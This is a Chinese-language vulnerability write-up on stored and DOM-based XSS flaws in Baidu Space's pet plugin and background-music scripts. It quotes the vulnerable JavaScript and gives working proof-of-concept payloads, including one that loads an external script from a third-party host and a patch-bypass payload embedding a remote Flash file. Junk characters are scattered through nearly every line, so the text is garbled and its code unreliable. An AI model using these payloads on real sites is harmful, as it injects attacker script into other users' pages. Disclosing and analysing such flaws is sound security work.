百度空间的宠物插件对用户输入变量未经任何过滤便存储,并不经过滤输出,造成XSS.
6 S4 @" z7 I6 U% W2 B- v) Y. h0 e# h/ h/ M2 q$ T- a5 Q
1.在http://hi.baidu.com/p__z/modify/sppet中,用户可以输入留言管理,提交后,未过滤直接储存. % }7 I3 h' L6 o# C* m2 o
2.在http://hi.baidu.com/ui/scripts/pet/pet.js中
* k0 e3 v( J2 q. M) L K
" y; Q1 s, @- y) i将输出一段HTML:<p style="margin-top:5px"><strong>’+F[2]+"说:</strong>"+BdUtil.insertWBR(F[0], 4)+’</p> - G7 C" o ?8 _- r; J6 |
其中BdUtil.insertWBR为
3 s O% l8 `! C" T5 U1 |1 zfunction(text, step) { & }* G% q P/ y6 u, j) Z! A4 v
var textarea = textAreaCache || getContainer(); : A9 o* T3 x% q. t8 [
if (!textarea) { / I1 W3 ?! W3 W* T: `" L4 @
return text;
6 ~4 M/ e; S; r J$ H4 T8 ] }
! g g/ S$ l% T& K$ ^$ G9 L textarea.innerHTML = text.replace(/&/g, "&").replace(/</g, "<").replace(/>/g, ">"); 1 R$ C& G4 q3 z) U8 P
var string = textarea.value; 3 P, T% L& Z. }
var step = step || 5, reg = new RegExp("(\\S{" + step + "})", "gi");
+ P! I; K* U* h+ B3 ?) J/ ^ var result = string.replace(/(<[^>]+>)/gi, "$1<wbr/>").replace(/(>|^)([^<]+)(<|$)/gi, function (a, b, c, d) {if (c.length < step) {return a;}return b + c.replace(reg, "$1<wbr/>") + d;}).replace(/&([^;]*)(<wbr\/?>)([^;]*);/g, "&$1$3;");
6 w* D8 S- N6 s) f* l# I( A* T return result; 8 F" c( h/ {( Y
}
& N% d$ S& B- d+ h \' ?在首页中,textAreaCache 和 getContainer()均不存在,故!textarea为true,未经过滤直接return text.造成XSS. 2 [6 b- ?! G" r8 N3 M8 I# x
测试代码:宠物留言管理处输入:<img src=# onerror=alert(/qing/)> 9 }& a6 Z" O1 `4 ]
# T+ S# W* a' B3 U0 N; a! N
二:creatbgmusic() Dom-Xss Bug
- K# _2 b7 R" W5 S! M6 z3 p0 m百度空间的Javascript Dom函数creatbgmusic()在输出变量bgmusic*没有进行过滤,导致可以通过initBlogTextForFCK()函数构造容易HTML代码,最终导致xss漏洞 . S/ n' H3 n% V4 S
: Q4 o7 L# g. f/ }在http://hi.baidu.com//js/bgmusic.js?v=1.0.js 代码:
5 L& j/ j d2 ]" D0 b3 a* r& j
8 a# r* J# @' M2 W3 Nfunction creatbgmusic(murl, musicnum, IsMusicHide, IsMusicLoop, IsMusicAutoPlay, unknow, functype) {
. `6 [0 W' M* l& V; b2 L //传入的murl赋值到bgmusic1和bgmusic2中
$ u* }, r5 c8 P2 o4 r' N //可以通过构造类似代码来闭合标签如 "><img src=2 onerror=s=document.createElement("script");s.src="http://www.80vul.com/sobb/alert.php";document.body.appendChild(s);>#1 & h! w2 O7 }8 I& ^
var bgmusic1 = "<OBJECT id=phx width=100% classid=clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6 " + (IsMusicHide ? "height=45" : "") + ">" + "<PARAM NAME=\"URL\" VALUE=\"" + murl + "?t=" + Math.random() + "\">" + " <PARAM NAME=\"rate\" VALUE=\"1\">" + " <PARAM NAME=\"balance\" VALUE=\"0\">" + " <PARAM NAME=\"currentPosition\" VALUE=\"0\">" + " <PARAM NAME=\"defaultFrame\" VALUE=\"\">" + " <PARAM NAME=\"PlayCount\" VALUE=\"" + (IsMusicLoop ? 100 : 0) + "\">" + " <PARAM NAME=\"DisplayMode\" VALUE=\"0\">" + " <PARAM NAME=\"PreviewMode\" VALUE=\"0\">" + " <PARAM NAME=\"DisplayForeColor\" VALUE=\"16777215\">" + " <PARAM NAME=\"ShowCaptioning\" VALUE=\"0\">" + " <PARAM NAME=\"ShowControls\" VALUE=\"1\">" + " <PARAM NAME=\"ShowAudioControls\" VALUE=\"1\">" + " <PARAM NAME=\"ShowDisplay\" VALUE=\"0\">" + " <PARAM NAME=\"ShowGotoBar\" VALUE=\"0\">" + " <PARAM NAME=\"ShowStatusBar\" VALUE=\"0\">" + " <PARAM NAME=\"ShowTracker\" VALUE=\"1\">" + " <PARAM NAME=\"autoStart\" VALUE=\"" + (IsMusicAutoPlay ? 1 : 0) + "\">" + " <PARAM NAME=\"AutoRewind\" VALUE=\"" + (IsMusicAutoPlay ? 1 : 0) + "\">" + " <PARAM NAME=\"currentMarker\" VALUE=\"0\">" + " <PARAM NAME=\"invokeURLs\" VALUE=\"0\">" + " <PARAM NAME=\"baseURL\" VALUE=\"\">" + " <PARAM NAME=\"volume\" VALUE=\"100\">" + " <PARAM NAME=\"mute\" VALUE=\"0\">" + " <PARAM NAME=\"stretchToFit\" VALUE=\"0\">" + " <PARAM NAME=\"windowlessVideo\" VALUE=\"1\">" + " <PARAM NAME=\"enabled\" VALUE=\"1\">" + " <PARAM NAME=\"EnableFullScreenControls\" VALUE=\"0\">" + " <PARAM NAME=\"EnableTracker\" VALUE=\"1\">" + " <PARAM NAME=\"EnablePositionControls\" VALUE=\"1\">" + " <PARAM NAME=\"enableContextMenu\" VALUE=\"0\">" + " <PARAM NAME=\"SelectionStart\" VALUE=\"0\">" + " <PARAM NAME=\"SelectionEnd\" VALUE=\"0\">" + " <PARAM NAME=\"fullScreen\" VALUE=\"0\">" + " <PARAM NAME=\"SAMIStyle\" VALUE=\"\">" + " <PARAM NAME=\"SAMILang\" VALUE=\"\">" + " <PARAM NAME=\"SAMIFilename\" VALUE=\"\">" + " <PARAM NAME=\"captioningID\" VALUE=\"\">" + " <PARAM NAME=\"Visualizations\" VALUE=\"1\">";
- ^7 Q) H7 v9 A, R; [4 n& u: O& u$ P if (musicnum <= 1) {
4 e# w! _% U5 O) a0 J bgmusic1 += " <PARAM NAME=\"uiMode\" VALUE=\"mini\">";
; D0 c9 R. X) q } 1 t8 Q, d4 A4 v) u, i+ n+ s
bgmusic1 += "</OBJECT>";
9 M0 P; N" J. g# N var bgmusic2 = "<EMBED src=\"" + murl + "?t=" + Math.random() + "\" width=\"100%\" " + (IsMusicHide ? "height=45" : "") + " type=\"application/x-mplayer2\" invokeurls=\"0\" autogotourl=\"false\" autostart=" + (IsMusicAutoPlay ? 1 : 0) + " loop=" + (IsMusicLoop ? 1 : 0) + " quality=\"high\"";
; G! }' U* g( [# W- h! _' D if (musicnum <= 1) {
8 ?& ~ s8 F3 J, K bgmusic2 += "showcontrols=\"1\" showpositioncontrols=\"0\" "; . j. I, B: r$ O
} 5 ?: F r9 Y6 Q; u
bgmusic2 += "> </EMBED>"; - v) _/ Y# E+ x7 w D
var bgmusic3 = "<div id=\"m_bgmusic\" class=\"modbox\">\u5BF9\u4E0D\u8D77\uFF0C\u60A8\u5C1A\u672A\u5B89\u88C5windows media player\uFF0C\u65E0\u6CD5\u6B23\u8D4F\u8BE5\u7A7A\u95F4\u7684\u80CC\u666F\u97F3\u4E50\uFF0C\u8BF7\u5148<a href=\"http://www.baidu.com/s?wd=windows+media+player+%CF%C2%D4%D8&cl=3\" target=\"_blank\">\u4E0B\u8F7D\u5E76\u5B89\u88C5</a><br><br></div>";
9 \4 U$ z6 f5 c* V var bgmus = detectWMP(); ( a: s1 l) f& V- u3 ?
if (functype == "FckMusicHelper") {
2 {" d' P7 ~6 M0 `$ c4 w5 l# R if (bgmus.installed) {
( m, Q% j5 ~. A1 z if (bgmus.type == "IE") {
( E1 f/ O i6 A# B6 [$ P return bgmusic1; ' K+ w3 D8 a s w
} else if (bgmus.type == "NS") {
) o* Q' O" f8 E, V$ N return bgmusic2; + Z, @6 U% W) D
}
. v! K+ s* m& m2 i } else { / q5 Q0 ^ n! N# u1 M
return bgmusic3;
' F5 |9 h/ N4 ?! x' J }
5 f4 P+ S2 z/ O } else {
9 m ^: u/ N+ z" C5 ~ if (bgmus.installed) { e+ [+ ~$ a- L6 y# U8 a2 I" \& Y
//document.write 直接输出bgmusic变量 导致xss
7 J t, k1 x, h if (bgmus.type == "IE") {
, X. g! |% r K3 \4 @ document.write(bgmusic1);
) Z" u! B% s9 t+ \$ p9 w' t } else if (bgmus.type == "NS") {
$ W4 z2 ?: C( Q document.write(bgmusic2); 9 g( |4 o2 i, w/ x, o, p' z
} $ E6 W: Y' p: K; w: D
} else { 8 K3 E4 T# S% n& x- k. |
document.write(bgmusic3); & {: `+ ]6 u p; D* ~" K2 G* N Y5 ?
} % a* K( T- e. a6 [) g2 W6 ~
return ""; ! I! U! [/ v/ @+ R! `# W& y/ z
} + c$ L" }; e5 T8 n7 ]
} & ?% E6 j) G0 m8 n d9 c
" P* i8 Q, l! a- F% n2 q在看百度空间里的initBlogTextForFCK()函数,调用了creatbgmusic() ,代码如下: * w# h4 r4 X+ P' b
+ }$ H) P( P6 e- g" y3 n0 @% ?: V
function initBlogTextForFCK(){ 6 V3 a$ r# i$ f! f5 p- B1 g
//fck init music
. \7 ]* n0 N) w# c z9 w/ `if(window.Node){Node.prototype.replaceNode=function(Node){this.parentNode.replaceChild(Node,this);}}
9 b: C& B0 _% u' V. xvar imgBox=document.getElementsByName(’musicName’); //取得了文章中的所有name="musicName"的标签数组
5 @# z" \2 i) j, ?1 wvar isAutoPlay=true;
' F5 @( }7 V. Dfor(var i=0,n=imgBox.length;i<n;i++){ //然后遍历.
! [$ c7 M4 K! j" ^, J var img=imgBox; 0 O; r7 \) S4 [3 c& C( y
if(img.getAttribute(’rel’)){
; a& x9 k; T$ O" w var musicSrc=img.getAttribute(’rel’); //取得标签中rel的值,赋值给musicSrc
- \( e3 T. ~6 }5 `6 P# Y# ^9 F var musicDiv = document.createElement("SPAN");
9 e9 f0 q Y' O6 b7 p9 l var tmp=musicSrc.substr (musicSrc.indexOf(’#’)+1, 1); //以"#"为界分割musicSrc字符串,提取自动播放的flag[tmp]
* s3 w- |2 ?) m. I/ C6 K5 c% s
( ^9 H, @) Y( H3 x/ B3 o M; t6 o .......................... $ o z' U0 k; V k* \1 k2 E1 Y
: ?" U0 x6 H, @- J4 C& _" D //直接将部分musicSrc传入creatbgmusic函数.在creatbgmusic函数直接把传入的murl赋值到bgmusic1和bgmusic2中并document.write出来.
$ a5 ~% C8 z# b5 {+ { var shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)),1,true,false,tmpAutoPlay,tmpAutoPlay,’FckMusicHelper’);
8 I; d: K3 u, v' \/ z4 w0 @ shtml=shtml.replace(’width=100%’,’width=200’).replace(’width="100%"’,’width=200 height=45’); img.replaceNode(musicDiv); 6 [. e8 h! Z& L. T
musicDiv.innerHTML=shtml;
2 Q3 M( z+ l- g& a7 [- A/ G$ f5 G$ G i--;n--; $ k- d* h2 l: O2 [& B
} , a+ p/ ^3 j0 u. p7 R4 |$ O
}
. o' m4 M% f) O1 s5 a9 F
! ?, g, h" A1 _- }; f) a从上面的代码分析可以看出:在所有的参数传递中,我们没有看到过滤.百度空间的富文本编辑器的过滤模式是基于HTML语法的,不会过滤掉一个属性的值中的HTML标签.所以我们可以精心构造一个的恶意的标签,在JS进行DOM操作后引起XSS. " O( q& G' X% t
4 \9 E6 p3 j1 V/ n ?0 e2 s
测试方法:<img width="200" height="45" name="musicName" rel=’"><img src=2 onerror=alert(/qing/)>#1’ src="http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif"/>
- X# H8 D6 c. f+ S* ~. {; h) c5 \, e: i; B6 ~* l) a
等待官方补丁
9 [# ?$ V% G5 z* m& R5 d6 d
! M- r0 H) B; o) p& ]1 iupdate 2010年5月13日 & T6 {, t$ J" n/ `& F$ A% W
7 T- |, d' O) M+ [3 h4 U1 Z! F官方补丁: [3 O# e+ s- l, u, @( m
. x8 M9 [; O% }( f9 o) Tvar shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)),1,true,false,tmpAutoPlay,tmpAutoPlay,’FckMusicHelper’); , e- ?) u* {$ o f2 x g+ C
改为: ) A. [5 v! K7 X' o5 D0 i/ Z7 G Z
var shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)).replace(/[\s><()]+/g,’’),1,true,false,isAutoPlay,isAutoPlay,’FckMusicHelper’);
h$ m; ?$ {/ v; x" E
7 m9 c# ~) L+ i- H8 `8 dupdate 2010年5月13日 21:50:37 9 `4 q4 p3 C% v6 m& V
6 }+ s$ j1 B1 T4 ~3 P补丁存在漏洞 没有过滤" 可以继续跨:
# C% `# K9 C9 n- \
! _% G. s6 { X# |# |NEW POC:
* ~6 }: W+ ^0 f1 {3 I
0 | T- ~6 }% p) W5 e<img width="200" height="45" _fcksavedurl=" http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif" src="http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif" rel=’http://www.xsser.net/pz/js.swf" * K& ^* |1 P4 c: ]# O
! H) |3 _! p" k0 V
allowscriptaccess="always" type="application/x-shockwave-flash"#2’ name="musicName"/>
* x) ^( c8 o& U/ y
- A. Z l3 x1 s |